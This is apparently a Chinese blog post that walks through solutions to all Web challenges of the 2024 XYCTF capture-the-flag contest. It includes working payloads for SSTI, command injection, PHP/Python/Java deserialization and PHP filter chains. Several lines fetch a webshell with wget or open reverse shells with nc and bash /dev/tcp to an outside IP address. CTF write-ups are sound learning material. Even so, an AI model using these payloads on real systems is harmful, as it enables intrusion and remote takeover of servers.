【Web】2024XYCTF题解(全)

作者 : admin 本文共11784个字,预计阅读时间需要30分钟 发布时间: 2024-04-30 共3人阅读

目录

ezhttp 

ezmd5

warm up

ezMake 

ez?Make

εZ?¿м@Kε¿?

我是一个复读机 

牢牢记住,逝者为大

ezRCE

ezPOP

ezSerialize 

ezClass 

pharme 

连连看到底是连连什么看

ezLFI

login

give me flag

baby_unserialize 


ezhttp 

【Web】2024XYCTF题解(全)插图

访问./robots.txt

【Web】2024XYCTF题解(全)插图(1)

继续访问拿到账号密码

【Web】2024XYCTF题解(全)插图(2)

 登录,然后就是抓包各种http八股

【Web】2024XYCTF题解(全)插图(3)

ezmd5

GitHub – zhijieshi/md5collgen

【Web】2024XYCTF题解(全)插图(4)

生成的图片分别上传即可

【Web】2024XYCTF题解(全)插图(5)

(只允许上传jpg,重新生成就行,懒得放图了) 

【Web】2024XYCTF题解(全)插图(6)

点击比较图片拿到flag

【Web】2024XYCTF题解(全)插图(7)

warm up

【Web】2024XYCTF题解(全)插图(8)

 鉴定为md5八股

?val1[]=1&val2[]=2&md5=0e215962017&XY=0e215962017&XYCTF=0e215962017

【Web】2024XYCTF题解(全)插图(9)

访问./LLeeevvveeelll222.php

 【Web】2024XYCTF题解(全)插图(10)

数组绕过preg_match,preg_replace命令执行

?a=/1/e&b=system('tac /f*')&c=1
a[]=1

 【Web】2024XYCTF题解(全)插图(11)

ezMake 

【Web】2024XYCTF题解(全)插图(12)

PATH 环境变量被显式地设定为空。这段 Makefile 的逻辑检查了 PATH 是否未定义,如果未定义则设为空,如果已定义也重设为空。由于 PATH 被设置为空,shell 将无法定位到除内置命令之外的任何外部命令的位置。

Bash 内建命令

这些命令是由Bash自身提供,而不是独立的程序:

  • alias – 定义或显示别名。
  • cd – 改变当前目录。
  • echo – 输出参数到标准输出。
  • exit – 退出当前shell。
  • export – 设置或显示环境变量。
  • history – 显示命令历史记录。
  • pwd – 打印当前工作目录的路径。
  • read – 从标准输入读取一行数据。
  • set – 设置或取消设置shell选项和位置参数。
  • type – 显示一个命令的类型。
  • unset – 删除变量或函数的定义。

echo可以执行

【Web】2024XYCTF题解(全)插图(13)

直接echo写马会有waf

【Web】2024XYCTF题解(全)插图(14)

甚至base64也不行🤔

【Web】2024XYCTF题解(全)插图(15)

hex2bin可以过

echo '' > yjh.php

【Web】2024XYCTF题解(全)插图(16)

成功写马,命令执行拿flag

【Web】2024XYCTF题解(全)插图(17)

ez?Make 

这题patch了一下上题的非预期,不能再echo写马了

但也把/bin下的命令放了出来,不再有PATH的限制

知道flag路径在/flag,所以可以cd再进行读文件,读文件的方法ban了不少,经过测试more还能用

【Web】2024XYCTF题解(全)插图(18)

最终payload:

cd ..&&cd ..&&cd ..&&cd ..&&cd ..&&more [0-z][0-z][0-z][0-z]

【Web】2024XYCTF题解(全)插图(19)

εZ?¿м@Kε¿?

右键查看源码

【Web】2024XYCTF题解(全)插图(20)

访问./hint.php

【Web】2024XYCTF题解(全)插图(21)

就是说给了个白名单

关于makefile的自动变量

Makefile中的自动变量是在规则执行时由make自动定义的变量。这些变量非常有用,因为它们可以自动获取文件名、目录名和更多的信息,使得Makefile编写更加简洁和灵活。下面是一些常用的自动变量:

  • $@: 表示规则中的目标文件名。如果在模式规则中,它表示的是目标的一个实例。
  • $<: 表示规则中的第一个依赖文件名。
  • $?: 表示所有比目标文件还要新的依赖文件列表,用空格分隔。
  • $^: 表示所有的依赖文件列表,这些依赖文件以空格分隔,不包含重复的依赖文件。
  • $+: 这个变量和$^很像,但是它包含了所有的依赖文件,并保留了重复的文件。
  • $*: 在模式规则中,它表示匹配于目标模式中的%部分的字符串。例如,在规则 %.o: %.c 中,如果目标是 foo.o,则 $* 的值就是 foo

 Makefile的编写及四个特殊符号的意义@、$@、$^、$ – 春风一郎 – 博客园 (cnblogs.com)

可以自己做个小lab

【Web】2024XYCTF题解(全)插图(22)

注意到通过报错可以带出命令执行结果的第一个空格前的字符串

通过<可以输入重定向文件

靶机中,$<就是/flag,此外要注意在makefile中$$代表的是shell中的$(见文章中)

最终payload:

$$(<$<)

成功报错带出

【Web】2024XYCTF题解(全)插图(23)

我是一个复读机 

【Web】2024XYCTF题解(全)插图(24)

进来一个登录框,附件给的字典爆进去

 【Web】2024XYCTF题解(全)插图(25)

一眼SSTI,注意到{{}}、{%%}、_、’都被ban了,这我还注个集贸啊😡

【Web】2024XYCTF题解(全)插图(26)

搞点破坏,发现只要是中文或特殊字符就可以被解析为{{}}

【Web】2024XYCTF题解(全)插图(27)

python SSTI的各种payload

 用request配合|attr绕过,最终payload:

?sentence=😡(()|attr(request.values.a)|attr(request.values.b)|attr(request.values.c)()|attr(request.values.d)(132)|attr(request.values.e)|attr(request.values.f)|attr(request.values.d)(request.values.g)(request.values.h)).read()😡&a=__class__&b=__base__&c=__subclasses__&d=__getitem__&e=__init__&f=__globals__&g=popen&h=cat /flag

或者

?sentence=😡lipsum|attr(request.args.glo)|attr(request.args.ge)(request.args.o)|attr(request.args.po)(request.args.cmd)|attr(request.args.re)()😡&glo=__globals__&ge=__getitem__&o=os&po=popen&cmd=cat /flag&re=read

【Web】2024XYCTF题解(全)插图(28)

牢牢记住,逝者为大

【Web】2024XYCTF题解(全)插图(29)

注意到eval用了字符串拼接的方式 

PHP中的eval()函数可以执行多行命令,但如果其中的某一行命令出现错误,PHP 解释器将会停止执行并抛出一个致命错误,索性这个man已经被注释了,为了命令执行,我们需要做的就是换行和注释掉mamba out

关于命令执行,因为限长,所以考虑用`$_GET[1]`来转接 

但对GET有诸多限制,连curl都打不了,考虑写马

写马有两种方式,一种echo >,另一种直接wget下载远程文件,本题显然是后者

payload:

?cmd=%0a`$_GET[1]`;%23&1=wget 124.222.136.33:1337/yjh.php

 %0a换行,%23注释

成功写马,命令执行拿到flag

 【Web】2024XYCTF题解(全)插图(30)

也可以nc反弹shell,至于关键词过滤,直接”就可以过掉

payload:

?cmd=%0a`$_GET[1]`;%23&1=nc 124.222.136.33 1337 -e /bi''n/sh

监听,成功反弹shell,拿flag

【Web】2024XYCTF题解(全)插图(31)

ezRCE

【Web】2024XYCTF题解(全)插图(32)

在shell环境中有一种特殊的表示字符的序列。在这种表示法中,\ 后面跟着一个八进制数,表示该字符的 ASCII 值。在bash中有一种特殊字符的引用的方式——$”(称为 ANSI-C quoting)它允许你在字符串中使用 ANSI C 转义序列来表示特殊字符或者 ASCII 控制字符。

贴一个字符串转8进制的脚本

def string_to_octal(input_str):
    octal_str = ""
    for char in input_str:
        octal_char = oct(ord(char))[2:]
        octal_str += "\" + octal_char.zfill(3)
    return octal_str

input_str = "指定字符串"
octal_output = string_to_octal(input_str)
print(octal_output)

 给一个lab

$’\l54\163′

成功执行了ls

【Web】2024XYCTF题解(全)插图(33)

能否直接读文件呢

$’\143\141\164\040\061\056\150\164\155\154′

可以看到其直接将单引号包裹的内容整体当成了一个命令,不能直接利用

【Web】2024XYCTF题解(全)插图(34)

bash中的一种特殊的语法Here String,用于将字符串作为命令的标准输入提供给命令。它的语法形式是 <<<,后跟一个字符串,形如:

command <<< "string"

 这里的 command 可以是任何接受标准输入的命令,而 string 则是要提供给该命令的字符串。

再给另一个lab

【Web】2024XYCTF题解(全)插图(35)

 bash <<< $'\143\141\164\040\146\154\141\147\056\160\150\160'

【Web】2024XYCTF题解(全)插图(36)

bash  $’\142\141\163\150′
cat flag.php $’\143\141\164\040\146\154\141\147\056\160\150\160′

$’\142\141\163\150′ <<< $'\143\141\164\040\146\154\141\147\056\160\150\160'

【Web】2024XYCTF题解(全)插图(37)

最终payload:

?cmd=$'2130'<<<$'3140762'

 【Web】2024XYCTF题解(全)插图(38)

ezPOP

【Web】2024XYCTF题解(全)插图(39)

链子很好看

CCC.__destruct -> AAA.__toString -> BBB.__get 

call_user_func($a,$b)($c)($d);这种构造很奇怪 

要求我们call_user_func返回一个函数

$c是返回函数的入参,call_user_func($a,$b)($c)的返回值又是个以$d为入参的函数

其实还挺好操作的,题目里unset了一下$_POST[‘a’],其实就是把数组元素清了一个,有关数组的操作很容易可以想到current

call_user_func(‘current’,’$_POST’)返回值完全可控,可以令其为sprintf

其返回一个字符串,返回值就是传入的参数

<?php

$var=sprintf(“Z3r4y”);

echo $var;

//Z3r4y

众所周知,()可以将字符串作为函数来处理

例如可以这样调用phpinfo()

<?php

$var=sprintf(“phpinfo”);

echo $var;

$var();

所以我们可以通过这样的操作来返回一个system,system的参数也完全可控

具体如下

exp

c="system";
$b->d="tac /f*";
$a->s=$b;
$c->c=$a;
echo serialize($c);

 最后因为要绕过抛错,所以删去生成字符串最后的’}’

payload: 

?xy=O:3:"CCC":1:{s:1:"c";O:3:"AAA":2:{s:1:"s";O:3:"BBB":2:{s:1:"c";s:6:"system";s:1:"d";s:7:"tac /f*";}s:1:"a";N;}

a=current&b=sprintf

 【Web】2024XYCTF题解(全)插图(40)

ezSerialize 

【Web】2024XYCTF题解(全)插图(41)

简单一个引用绕过

password=&$a->token;
echo serialize($a);

【Web】2024XYCTF题解(全)插图(42)

访问./fpclosefpclosefpcloseffflllaaaggg.php

【Web】2024XYCTF题解(全)插图(43)

链子

E#__unserialize -> D#__toString -> B#__get -> A#invoke -> C#__call

exp

 D#__toString -> B#__get -> A#invoke -> C#__call

$a=new E();
$b=new D();
$c=new B();
$d=new A();
$e=new C();
$d->mack=$e;
$c->luo=$d;
$b->lao=$c;
$a->name=$b;
echo serialize($a);

【Web】2024XYCTF题解(全)插图(44)

访问./saber_master_saber_master.php

【Web】2024XYCTF题解(全)插图(45)

PHP原生类总结

链子

XYCTFNO3#__wakeup -> XYCTFNO2.XYCTF() -> XYCTFNO3.XY() -> new SplFileObject(“php://filter/convert.base64-encode/resource=flag.php”)

exp

crypto0='dev1l';
$c->T1ng='yuroandCMD258';
$b->adwa=$c;
$a->KickyMu=$b;
$a->N1ght='oSthing';
echo serialize($a);

最后post传参

X=SplFileObject&Y=php://filter/convert.base64-encode/resource=flag.php

用SplFileObject配合php伪协议来读文件

【Web】2024XYCTF题解(全)插图(46)

base64解码得flag

【Web】2024XYCTF题解(全)插图(47)

ezClass 

【Web】2024XYCTF题解(全)插图(48)

把原生类玩明白了属于是

getMessage();
//Z3r4y

现在通过Error我们可以构造任意字符串,这不为所欲为

最终payload:

?a=Error&aa=system&b=Error&bb=cat /f*&c=getMessage

【Web】2024XYCTF题解(全)插图(49)

pharme 

右键查看源码

【Web】2024XYCTF题解(全)插图(50)

访问./class.php

【Web】2024XYCTF题解(全)插图(51)

preg_replace(‘/;+/’,’ch3nx1′,preg_replace(‘/[A-Za-z_]+/’,”,$this->cmd)))这段正则是将输入中的字母、下划线和括号都移除,并将连续的分号替换为字符串 ‘ch3nx1’ ,最后与’ch3nx1’比较判真

其实就是个白名单,只能含有字母A-Z,a-z,下划线_和左右括号(),其实也就是无参RCE
此外,eval中的字符串是拼接的,且不能用#和//进行注释,则要用__halt_compiler来终止编译

在 PHP 中,__halt_compiler() 是一个特殊的语言结构,用于在脚本中立即停止编译器的解析。这意味着,该函数之后的任何 PHP 代码都不会被编译器解析为 PHP 代码,但这些数据依然可以作为文件的一部分存在,可以通过 PHP 的 I/O 函数访问。

使用场景和目的:

  • 数据存储__halt_compiler() 常见于将数据直接嵌入到 PHP 脚本文件中的情况。这使得可以在一个文件中同时包含执行代码和非执行数据,如安装脚本、自解压脚本等。
  • 混合内容:可以在 PHP 文件中混合使用 PHP 代码和任意其他数据,不需要担心编译器会尝试解析那些非 PHP 数据。
  • 创建 PHAR 文件:PHAR (PHP Archive) 文件格式广泛使用 __halt_compiler() 来分隔 PHAR 元数据和包含的文件数据。

生成phar包

startBuffering();  //开始写文件
$phar->setStub('');  //写入stub
$o=new evil();
$phar->setMetadata($o);//写入meta-data
$phar->addFromString("test.txt","test");  //添加要压缩的文件
$phar->stopBuffering();
?>

因为对文件内容没有修改,所以不需要重算签名

gzip压缩一下过掉文件内容过滤

【Web】2024XYCTF题解(全)插图(52)

发包的时候改后缀和content-type为png即可

【Web】2024XYCTF题解(全)插图(53)

再过掉phar://开头的正则

file=php://filter/convert.base64-encode/resource=phar:///tmp/23f1a0f70f076b42b5b49f24ee28f696.png

【Web】2024XYCTF题解(全)插图(54) 

连连看到底是连连什么看

【Web】2024XYCTF题解(全)插图(55)

 点击about后存在一个文件包含

【Web】2024XYCTF题解(全)插图(56)

先随便尝试包含下index.php

【Web】2024XYCTF题解(全)插图(57)

访问./what’s_this.php

【Web】2024XYCTF题解(全)插图(58) 

 一眼顶针,鉴定为php_filter_chain

【Web】2024XYCTF题解(全)插图(59)

直接打的话XYCTF后会有脏数据

?p=convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode

手动加string.strip_tags过滤器来去除php标签

构造XYCTF<?php

【Web】2024XYCTF题解(全)插图(60) 

最终payload:

?p=convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-4LE.OSF05010001|convert.iconv.IBM912.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode|string.strip_tags

【Web】2024XYCTF题解(全)插图(61)

ezLFI

源码就是LFI

【Web】2024XYCTF题解(全)插图(62)

chmod 400 /flag:改变 /flag 文件的权限,设置为只有所有者可读

可以用php-filter-chain来包含一句话木马

有现成的github项目工程

GitHub – wupco/PHP_INCLUDE_TO_SHELL_CHAR_DICT

【Web】2024XYCTF题解(全)插图(63)

 

login

先在./register.php注册

【Web】2024XYCTF题解(全)插图(64)

再用注册的账号登录,抓包,响应头Set-Cookie有一个RememberMe的字段,此外注意到服务器是python的

【Web】2024XYCTF题解(全)插图(65)

 【Web】2024XYCTF题解(全)插图(66) 

对其base64解码,看到app🤔

【Web】2024XYCTF题解(全)插图(67)经过尝试是pickle(反)序列化

【Web】2024XYCTF题解(全)插图(68)

存在过滤,直接打打不通,⽤o字节码绕过过滤参照下文

最近碰到的 Python pickle 反序列化小总结

exp:

import base64

shell = b'''bash -c "bash -i >& /dev/tcp/124.222.136.33/1337 0<&1"'''  # 反弹shell语句

payload = b'''(ctimeit
timeit
(cos
system
V''' + shell + b'''
oo.'''

print(base64.b64encode(payload).decode())

【Web】2024XYCTF题解(全)插图(69) 

give me flag

【Web】2024XYCTF题解(全)插图(70)

考的哈希长度拓展攻击

GitHub – shellfeel/hash-ext-attack: 哈希长度扩展攻击利用脚本,免去了hashpump需要编译的烦恼

<?php
$time=time();
echo $time;

 【Web】2024XYCTF题解(全)插图(71)

import requests

url = 'http://127.0.0.1:31860/?md5=509dbe30c98c4ddb7817813e9a1fc3c6&value=%80%00%00%00%00%00%00%00%00%00%00%00%00X%01%00%00%00%00%00%00'

while True:

    res = requests.get(url=url)

    if "XYCTF" in res.text:
        print(res.text)

        break

【Web】2024XYCTF题解(全)插图(72)

baby_unserialize 

右键查看源码

【Web】2024XYCTF题解(全)插图(73)

访问./ser

【Web】2024XYCTF题解(全)插图(74) 

 随便传参回包让入参为payload

【Web】2024XYCTF题解(全)插图(75)

反序列化输入流限得很死,打JRMP绕过

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1338 CommonsCollections3 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjQuMjIyLjEzNi4zMy8xMzM3IDA+JjE=}|{base64,-d}|{bash,-i}'

【Web】2024XYCTF题解(全)插图(76) ysoserial自带的JRMPClient被waf掉了,重写一个

package org.example;

import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Base64;

public class JRMP {
    public static void main(String[] args) throws Exception {
        ObjID id = new ObjID();
        TCPEndpoint te = new TCPEndpoint("124.222.136.33", 1338);
        LiveRef liveRef = new LiveRef(id, te, false);
        UnicastRef ref = new UnicastRef(liveRef);
        RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);

        ByteArrayOutputStream barr = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(barr);
        oos.writeObject(obj);
        oos.close();

        byte[] byteArray = barr.toByteArray();

        String res = Base64.getEncoder().encodeToString(byteArray);
        System.out.println(res);
    }
}

运行生成的payload再url一次编码后打入

【Web】2024XYCTF题解(全)插图(77)

监听,成功反弹shell,env拿flag

【Web】2024XYCTF题解(全)插图(78)

本站无任何商业行为
个人在线分享-虚灵IT资料分享 » 【Web】2024XYCTF题解(全)
E-->